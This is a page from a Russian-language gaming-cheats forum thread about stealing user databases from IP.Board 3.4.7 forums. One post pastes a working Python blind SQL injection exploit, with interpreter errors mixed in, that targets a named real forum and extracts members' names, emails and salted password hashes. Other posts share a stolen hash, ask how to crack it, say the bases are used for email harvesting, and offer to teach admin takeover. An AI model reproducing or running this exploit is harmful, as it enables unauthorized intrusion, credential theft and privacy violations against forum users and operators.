[Уязвимость] Угоняем базу форума IPB версии 3.4.7 и меньше - Страница 2 - Zhyk.Ru Forums
Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация
Навигация
Zhyk.Ru LIVE! Реклама на Zhyk.Ru Доска почета top.zhyk.ru (beta) Премиум-аккаунт

Угоняем базу форума IPB версии 3.4.7 и меньше

-

Баги и читы Lineage 2

- Уязвимости, баги и читы для Lineage 2 в этом разделе

Ответ
 
Опции темы Опции просмотра
Старый 12.12.2014, 09:09   #16
 Разведчик
Аватар для Motherfuckers
 
Motherfuckers неизвестен в этих краяхMotherfuckers неизвестен в этих краяхMotherfuckers неизвестен в этих краях
Регистрация: 08.12.2014
Сообщений: 4
Популярность: -251
Сказал(а) спасибо: 1
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

да нечего сложного в гугле пропиши!
  Ответить с цитированием
Старый 12.12.2014, 13:02   #17
 Разведчик
Аватар для slastikdj
 
slastikdj никому не известный тип
Регистрация: 28.11.2012
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 6 раз(а) в 1 сообщении
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Цитата:
Сообщение от figvam74Посмотреть сообщение
Вопрос к автору темы, либо к кому либо кто тут есть вообще и разбирается в этом)
Вот угнал базу, он в md5(md5($salt).md5($pass)) + соль) Можно ли как то это теперь расшифровать?) т.е. расшифровка обычная, как и базы серверов ла2, или куда сложней?) Честно мало в этом разбираюсь, вот и спрашиваю)

Соль эт $salt. Я же написал, правильный хэш md5(md5($salt).md5($pass))
  Ответить с цитированием
Старый 13.12.2014, 08:52   #18
 Разведчик
Аватар для Gotfo
 
Gotfo никому не известный тип
Регистрация: 04.05.2014
Сообщений: 14
Популярность: 10
Сказал(а) спасибо: 2
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

как расшифровать то с солью?
  Ответить с цитированием
Старый 13.12.2014, 09:35   #19
 Разведчик
Аватар для Toker88
 
Toker88 никому не известный тип
Регистрация: 13.12.2014
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 26 раз(а) в 15 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Цитата:
Сообщение от GotfoПосмотреть сообщение
как расшифровать то с солью?

Его нельзя расшифровать, так же, как и мд5. Пора бы это уже запомнить)

По сути базы нужны для парсера мыл, а не аккаунтов.
  Ответить с цитированием
Старый 17.12.2014, 23:27   #20
 Разведчик
Аватар для KillerTT
 
KillerTT скоро будет известенKillerTT скоро будет известенKillerTT скоро будет известен
Регистрация: 31.03.2010
Сообщений: 42
Популярность: 241
Сказал(а) спасибо: 44
Поблагодарили 87 раз(а) в 37 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Подскажите как вообще запускать эксплоиты эти в гугле искал нечего толкового не нашёл.
________________
Аська-552014189
  Ответить с цитированием
Старый 20.12.2014, 02:13   #21
 Разведчик
Аватар для MrSmi
 
MrSmi никому не известный тип
Регистрация: 18.10.2012
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

>>> #!/usr/bin/env python
... # Sunday, November 09, 2014 - secthrowaway () safe-mail net
... # IP.Board <= 3.4.7 SQLi (blind, error based);
... # you can adapt to other types of blind injection if 'cache/sql_error_latest
.cgi' is unreadable
...
>>> url = 'http://forum.l2damage.ru/
File "<stdin>", line 1
url = 'http://forum.l2damage.ru/
^
SyntaxError: EOL while scanning string literal
>>> ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Ge
cko) Chrome/30.0.1599.17 Safari/537.36"
>>>
>>> import sys, re
>>>
>>> # <socks> - [Ссылки могут видеть только зарегистрированные пользователи. ]
... #import socks, socket
... #socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
... #socket.socket = socks.socksocket
... # </socks>
...
>>> import urllib2, urllib
>>>
>>> def inject(sql):
... try:
... urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.p
hp' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!
="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": u
a}))
... except urllib2.HTTPError, e:
... if e.code == 503:
... data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest
.cgi' % url, headers={"User-agent": ua})).read()
... txt = re.search("XPATH syntax error: '.*)'", data, re.MULTILIN
E)
... if txt is not None:
... return txt.group(1)
... sys.exit('Error [3], received unexpected data:\n%s' % data)
... sys.exit('Error [1]')
... sys.exit('Error [2]')
...
>>> def get(name, table, num):
... sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
... s = int(inject('LENGTH((%s))' % sqli))
... if s < 31:
... return inject(sqli)
... else:
... r = ''
... for i in range(1, s+1, 31):
... r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
... return r
...
>>> n = inject('SELECT COUNT(*) FROM members')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 3, in inject
NameError: global name 'url' is not defined
>>> print '* Found %s users' % n
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'n' is not defined
>>> for j in range(int(n)):
... print get('member_id', 'members', j)
... print get('name', 'members', j)
... print get('email', 'members', j)
... print get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', 'members
', j)
... print '----------------'


и что дальше?????
  Ответить с цитированием
Старый 20.12.2014, 21:56   #22
 Разведчик
Аватар для dortezy
 
dortezy никому не известный тип
Регистрация: 20.12.2014
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Ну вроде получилось, только что делать дальше?

Кто может расшифровать это

d616deac21a21bd810b7bab567280915:ZInO>

Или скажите как можно расшифровать это самому и реально ли вообще?

Да и еще одна проблема, вся база, мейли и хэшы показываются в командной строке, но только определенное количество столбцов, например показываются последние 100 логинов мэйлов и хэшов, а старые уже не видны и к ним нельзя вернутся прокруткой наверх. Как исправить эту проблему?
  Ответить с цитированием
Старый 21.12.2014, 04:44   #23
 Пехотинец
Аватар для Zheludd
 
Zheludd никому не известный тип
Регистрация: 09.07.2009
Сообщений: 72
Популярность: 13
Сказал(а) спасибо: 261
Поблагодарили 121 раз(а) в 76 сообщениях
Отправить сообщение для Zheludd с помощью ICQ Отправить сообщение для Zheludd с помощью Skype™
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Реально всё, но тут соль, так что забудь
________________
Just can't live that negative way...make way for the positive day!
  Ответить с цитированием
Старый 21.12.2014, 14:03   #24
 Разведчик
Аватар для Gotfo
 
Gotfo никому не известный тип
Регистрация: 04.05.2014
Сообщений: 14
Популярность: 10
Сказал(а) спасибо: 2
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Цитата:
Сообщение от ZheluddПосмотреть сообщение
Реально всё, но тут соль, так что забудь

а как с солью то расшифровать?
  Ответить с цитированием
Старый 21.12.2014, 17:09   #25
 Разведчик
Аватар для Posidon
 
Posidon никому не известный тип
Регистрация: 07.05.2010
Сообщений: 4
Популярность: 4
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Отправить сообщение для Posidon с помощью ICQ Отправить сообщение для Posidon с помощью Skype™
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Цитата:
Сообщение от GotfoПосмотреть сообщение
а как с солью то расшифровать?

passwordspro тебе поможет
________________
-------------------------------------
  Ответить с цитированием
Старый 21.12.2014, 17:28   #26
 Разведчик
Аватар для Gotfo
 
Gotfo никому не известный тип
Регистрация: 04.05.2014
Сообщений: 14
Популярность: 10
Сказал(а) спасибо: 2
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Цитата:
Сообщение от PosidonПосмотреть сообщение
passwordspro тебе поможет

там же соль никак
  Ответить с цитированием
Старый 21.12.2014, 18:12   #27
 Разведчик
Аватар для Itself
 
Itself никому не известный тип
Регистрация: 16.12.2009
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

как возобновить сеанс ? т.е не с 1 пользователя,а например с 500. И почему только на некоторых есть зашифрованный пароль,а в основном просто прочерк?
  Ответить с цитированием
Старый 22.12.2014, 04:57   #28
Заблокирован
 Разведчик
Аватар для karkajoi123
 
karkajoi123 никому не известный тип
Регистрация: 18.02.2011
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 1 раз в 1 сообщении
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Все вроде пашет,показывает сколько юзеров зарегано в базе,логин мыло вытаскивает ,а вот с паролем проблема.
В общем проблема в этой строчке print get('CONCAT(members_password, 0x3a, members_password)', 'members', j) .В общем выдает вот такое
[Ссылки могут видеть только зарегистрированные пользователи. ] .Как я понял база ругается что такой колонки нету,или я не прав ?Какие посоветуете пути решения ?
  Ответить с цитированием
Старый 23.12.2014, 15:36   #29
 Разведчик
Аватар для zoomcat3939
 
zoomcat3939 никому не известный тип
Регистрация: 19.06.2013
Сообщений: 8
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 2 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

где лог сохраняется ?
  Ответить с цитированием
Старый 25.12.2014, 18:23   #30
 Разведчик
Аватар для Danique
 
Danique никому не известный тип
Регистрация: 25.12.2014
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Могу научить заходить под админом с помощью этого сплоита и можно делать всякие гадости админам
  Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Продам базу форума игроков WoT kcash World of Tanks 0 31.07.2013 15:29

www.webmoney.ru
Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 17:37.

Powered by vBulletin
Copyright © 2017 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Protected by GShost.net